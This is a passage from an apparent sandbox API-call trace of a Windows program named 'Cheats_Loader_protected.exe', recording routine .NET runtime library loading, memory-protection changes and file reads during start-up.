NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe690*=0x7437e48c, NumberOfBytesToProtect=0x13fe694, NewAccessProtection=0x4, OldAccessProtection=0x13fe6c8 | out: BaseAddress=0x13fe690*=0x7437e000, NumberOfBytesToProtect=0x13fe694, OldAccessProtection=0x13fe6c8*=0x2) returned 0x0 [0062.508] GetCurrentProcess () returned 0xffffffff [0062.509] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe690*=0x7437e48c, NumberOfBytesToProtect=0x13fe694, NewAccessProtection=0x2, OldAccessProtection=0x13fe6c8 | out: BaseAddress=0x13fe690*=0x7437e000, NumberOfBytesToProtect=0x13fe694, OldAccessProtection=0x13fe6c8*=0x4) returned 0x0 [0062.509] SetLastError (dwErrCode=0x0) [0062.509] GetProcAddress (hModule=0x74310000, lpProcName="IsAppThemed") returned 0x743425a0 [0062.510] GetProcAddress (hModule=0x74310000, lpProcName="IsAppThemedW") returned 0x0 [0062.511] IsAppThemed () returned 0x1 [0062.514] GetProcAddress (hModule=0x772d0000, lpProcName="CreateActCtx") returned 0x0 [0062.516] GetProcAddress (hModule=0x772d0000, lpProcName="CreateActCtxA") returned 0x7731d680 [0062.518] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemAlloc") returned 0x749b7d40 [0062.518] CoTaskMemAlloc (cb=0xf0) returned 0xc3548 [0062.518] CreateActCtxA (pActCtx=0x13ff2e4) returned 0xb823c [0062.731] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemFree") returned 0x749b64b0 [0062.732] CoTaskMemFree (pv=0xc3548) [0062.821] SysReAllocStringLen (in: pbstr=0x13fe00c*=0x0, psz="user32.dll", len=0xa | out: pbstr=0x13fe00c*="user32.dll") returned 1 [0062.821] CharLowerBuffW (in: lpsz="user32.dll", cchLength=0xa | out: lpsz="user32.dll") returned 0xa [0062.821] LoadLibraryExW (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x750c0000 [0062.821] GetLastError () returned 0x0 [0062.822] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0062.822] GetModuleFileNameA (in: hModule=0x750c0000, lpFilename=0x13fdef0, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0062.822] GetCurrentProcess () returned 0xffffffff [0062.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdff4*=0x7514e3a8, NumberOfBytesToProtect=0x13fdff8, NewAccessProtection=0x4, OldAccessProtection=0x13fe02c | out: BaseAddress=0x13fdff4*=0x7514e000, NumberOfBytesToProtect=0x13fdff8, OldAccessProtection=0x13fe02c*=0x2) returned 0x0 [0062.822] GetCurrentProcess () returned 0xffffffff [0062.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdff4*=0x7514e3a8, NumberOfBytesToProtect=0x13fdff8, NewAccessProtection=0x2, OldAccessProtection=0x13fe02c | out: BaseAddress=0x13fdff4*=0x7514e000, NumberOfBytesToProtect=0x13fdff8, OldAccessProtection=0x13fe02c*=0x4) returned 0x0 [0062.823] GetCurrentProcess () returned 0xffffffff [0062.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdff4*=0x7514e3b0, NumberOfBytesToProtect=0x13fdff8, NewAccessProtection=0x4, OldAccessProtection=0x13fe02c | out: BaseAddress=0x13fdff4*=0x7514e000, NumberOfBytesToProtect=0x13fdff8, OldAccessProtection=0x13fe02c*=0x2) returned 0x0 [0062.823] GetCurrentProcess () returned 0xffffffff [0062.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdff4*=0x7514e3b0, NumberOfBytesToProtect=0x13fdff8, NewAccessProtection=0x2, OldAccessProtection=0x13fe02c | out: BaseAddress=0x13fdff4*=0x7514e000, NumberOfBytesToProtect=0x13fdff8, OldAccessProtection=0x13fe02c*=0x4) returned 0x0 [0062.823] SetLastError (dwErrCode=0x0) [0062.824] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterWindowMessage") returned 0x0 [0062.824] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterWindowMessageW") returned 0x750f0450 [0062.824] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc19c [0062.824] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc19d [0062.838] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\10c894cab0a0e771eaf82414b0906f03\\system.configuration.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0062.839] GetLastError () returned 0x0 [0062.839] SysReAllocStringLen (in: pbstr=0x13fc968*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x13fc968*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux") returned 1 [0062.839] GetThreadLocale () returned 0x409 [0062.839] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0062.839] GetThreadLocale () returned 0x409 [0062.839] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0062.839] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fc6ec, lpFilePart=0x13fc6e8 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", lpFilePart=0x13fc6e8*="System.Configuration.ni.dll.aux") returned 0x84 [0062.839] SysReAllocStringLen (in: pbstr=0x13fc968*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x13fc968*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux") returned 1 [0062.839] SysReAllocStringLen (in: pbstr=0x13fc918*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", len=0x84 | out: pbstr=0x13fc918*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux") returned 1 [0062.839] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", cchLength=0x84 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\10c894cab0a0e771eaf82414b0906f03\\system.configuration.ni.dll.aux") returned 0x84 [0062.839] SysReAllocStringLen (in: pbstr=0x13fc968*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\10c894cab0a0e771eaf82414b0906f03\\system.configuration.ni.dll.aux", len=0x84 | out: pbstr=0x13fc968*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\10c894cab0a0e771eaf82414b0906f03\\system.configuration.ni.dll.aux") returned 1 [0062.839] SetLastError (dwErrCode=0x0) [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] GetCurrentThreadId () returned 0x13dc [0062.839] SetEvent (hEvent=0x20c) returned 1 [0062.839] GetFileSize (in: hFile=0xf0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x360 [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] GetCurrentThreadId () returned 0x13dc [0062.840] SetEvent (hEvent=0x20c) returned 1 [0062.840] ReadFile (in: hFile=0xf0, lpBuffer=0xc74e0, nNumberOfBytesToRead=0x360, lpNumberOfBytesRead=0x13fca1c, lpOverlapped=0x0 | out: lpBuffer=0xc74e0*, lpNumberOfBytesRead=0x13fca1c*=0x360, lpOverlapped=0x0) returned 1 [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] ResetEvent (hEvent=0x200) returned 1 [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] ResetEvent (hEvent=0x200) returned 1 [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] GetCurrentThreadId () returned 0x13dc [0062.841] SetEvent (hEvent=0x20c) returned 1 [0062.841] SetEvent (hEvent=0x200) returned 1 [0062.842] CloseHandle (hObject=0xf0) returned 1 [0062.851] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\7334607a1c01834b6f09c482bd20ff7e\\system.core.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0 [0062.851] GetLastError () returned 0x0 [0062.851] SysReAllocStringLen (in: pbstr=0x13fc028*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x13fc028*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux") returned 1 [0062.851] GetThreadLocale () returned 0x409 [0062.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0062.852] GetThreadLocale () returned 0x409 [0062.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0062.852] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fbdac, lpFilePart=0x13fbda8 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", lpFilePart=0x13fbda8*="System.Core.ni.dll.aux") returned 0x72 [0062.852] SysReAllocStringLen (in: pbstr=0x13fc028*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x13fc028*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux") returned 1 [0062.852] SysReAllocStringLen (in: pbstr=0x13fbfd8*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x13fbfd8*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux") returned 1 [0062.852] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", cchLength=0x72 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\7334607a1c01834b6f09c482bd20ff7e\\system.core.ni.dll.aux") returned 0x72 [0062.852] SysReAllocStringLen (in: pbstr=0x13fc028*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\7334607a1c01834b6f09c482bd20ff7e\\system.core.ni.dll.aux", len=0x72 | out: pbstr=0x13fc028*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\7334607a1c01834b6f09c482bd20ff7e\\system.core.ni.dll.aux") returned 1 [0062.852] SetLastError (dwErrCode=0x0) [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] GetCurrentThreadId () returned 0x13dc [0062.852] SetEvent (hEvent=0x20c) returned 1 [0062.852] GetFileSize (in: hFile=0x3a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x384 [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] GetCurrentThreadId () returned 0x13dc [0062.886] SetEvent (hEvent=0x20c) returned 1 [0062.886] ReadFile (in: hFile=0x3a0, lpBuffer=0xc7938, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x13fc0dc, lpOverlapped=0x0 | out: lpBuffer=0xc7938*, lpNumberOfBytesRead=0x13fc0dc*=0x384, lpOverlapped=0x0) returned 1 [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] ResetEvent (hEvent=0x200) returned 1 [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] ResetEvent (hEvent=0x200) returned 1 [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] GetCurrentThreadId () returned 0x13dc [0062.888] SetEvent (hEvent=0x20c) returned 1 [0062.889] SetEvent (hEvent=0x200) returned 1 [0062.889] CloseHandle (hObject=0x3a0) returned 1 [0062.902] SysReAllocStringLen (in: pbstr=0x13faef4*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13faef4*="kernel32.dll") returned 1 [0062.902] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.902] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.904] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] ResetEvent (hEvent=0x200) returned 1 [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] ResetEvent (hEvent=0x200) returned 1 [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] GetCurrentThreadId () returned 0x13dc [0062.905] SetEvent (hEvent=0x20c) returned 1 [0062.905] SetEvent (hEvent=0x200) returned 1 [0062.905] CloseHandle (hObject=0x3a0) returned 1 [0062.910] SysReAllocStringLen (in: pbstr=0x13fb5e4*=0x0, psz="System.Core.ni.dll", len=0x12 | out: pbstr=0x13fb5e4*="System.Core.ni.dll") returned 1 [0062.910] CharLowerBuffW (in: lpsz="System.Core.ni.dll", cchLength=0x12 | out: lpsz="system.core.ni.dll") returned 0x12 [0062.910] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\7334607a1c01834b6f09c482bd20ff7e\\System.Core.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x70570000 [0063.478] GetLastError () returned 0x0 [0063.479] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0063.479] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0063.479] SetLastError (dwErrCode=0x0) [0063.491] SysReAllocStringLen (in: pbstr=0x13fbf24*=0x0, psz="System.Configuration.ni.dll", len=0x1b | out: pbstr=0x13fbf24*="System.Configuration.ni.dll") returned 1 [0063.491] CharLowerBuffW (in: lpsz="System.Configuration.ni.dll", cchLength=0x1b | out: lpsz="system.configuration.ni.dll") returned 0x1b [0063.491] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\10c894cab0a0e771eaf82414b0906f03\\System.Configuration.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x70470000 [0063.606] GetLastError () returned 0x0 [0063.606] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0063.606] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0063.606] SetLastError (dwErrCode=0x0) [0063.833] SysReAllocStringLen (in: pbstr=0x13ff0d4*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ff0d4*="kernel32") returned 1 [0063.833] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.833] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0063.838] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0063.858] SysReAllocStringLen (in: pbstr=0x13ff018*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13ff018*="kernel32") returned 1 [0063.858] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0063.858] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0063.860] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringOrdinal") returned 0x772e7070 [0063.861] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x105, lpBuffer=0x13fec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x0) returned 0x3a [0063.951] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\505cf682ecefa94755fc069d26e7434e\\system.xml.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0063.951] GetLastError () returned 0x0 [0063.951] SysReAllocStringLen (in: pbstr=0x13fc760*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x13fc760*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux") returned 1 [0063.951] GetThreadLocale () returned 0x409 [0063.951] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0063.951] GetThreadLocale () returned 0x409 [0063.951] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0063.951] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fc4e4, lpFilePart=0x13fc4e0 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", lpFilePart=0x13fc4e0*="System.Xml.ni.dll.aux") returned 0x70 [0063.951] SysReAllocStringLen (in: pbstr=0x13fc760*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x13fc760*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux") returned 1 [0063.951] SysReAllocStringLen (in: pbstr=0x13fc710*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", len=0x70 | out: pbstr=0x13fc710*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux") returned 1 [0063.951] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", cchLength=0x70 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\505cf682ecefa94755fc069d26e7434e\\system.xml.ni.dll.aux") returned 0x70 [0063.951] SysReAllocStringLen (in: pbstr=0x13fc760*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\505cf682ecefa94755fc069d26e7434e\\system.xml.ni.dll.aux", len=0x70 | out: pbstr=0x13fc760*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\505cf682ecefa94755fc069d26e7434e\\system.xml.ni.dll.aux") returned 1 [0063.951] SetLastError (dwErrCode=0x0) [0063.951] GetCurrentThreadId () returned 0x13dc [0063.951] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] SetEvent (hEvent=0x20c) returned 1 [0063.952] GetFileSize (in: hFile=0xf0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] GetCurrentThreadId () returned 0x13dc [0063.952] SetEvent (hEvent=0x20c) returned 1 [0063.952] ReadFile (in: hFile=0xf0, lpBuffer=0xc7388, nNumberOfBytesToRead=0x2ec, lpNumberOfBytesRead=0x13fc814, lpOverlapped=0x0 | out: lpBuffer=0xc7388*, lpNumberOfBytesRead=0x13fc814*=0x2ec, lpOverlapped=0x0) returned 1 [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] ResetEvent (hEvent=0x200) returned 1 [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] ResetEvent (hEvent=0x200) returned 1 [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] GetCurrentThreadId () returned 0x13dc [0063.954] SetEvent (hEvent=0x20c) returned 1 [0063.954] SetEvent (hEvent=0x200) returned 1 [0063.954] CloseHandle (hObject=0xf0) returned 1 [0063.965] SysReAllocStringLen (in: pbstr=0x13fb62c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fb62c*="kernel32.dll") returned 1 [0063.965] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0063.965] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0063.967] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] ResetEvent (hEvent=0x200) returned 1 [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] ResetEvent (hEvent=0x200) returned 1 [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] GetCurrentThreadId () returned 0x13dc [0063.968] SetEvent (hEvent=0x20c) returned 1 [0063.968] SetEvent (hEvent=0x200) returned 1 [0063.968] CloseHandle (hObject=0xf0) returned 1 [0063.973] SysReAllocStringLen (in: pbstr=0x13fbd1c*=0x0, psz="System.Xml.ni.dll", len=0x11 | out: pbstr=0x13fbd1c*="System.Xml.ni.dll") returned 1 [0063.973] CharLowerBuffW (in: lpsz="System.Xml.ni.dll", cchLength=0x11 | out: lpsz="system.xml.ni.dll") returned 0x11 [0063.973] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\505cf682ecefa94755fc069d26e7434e\\System.Xml.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x6fd30000 [0064.503] GetLastError () returned 0x0 [0064.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0064.503] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0064.503] SetLastError (dwErrCode=0x0) [0064.744] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessW") returned 0x0 [0064.745] GetProcAddress (hModule=0x756e0000, 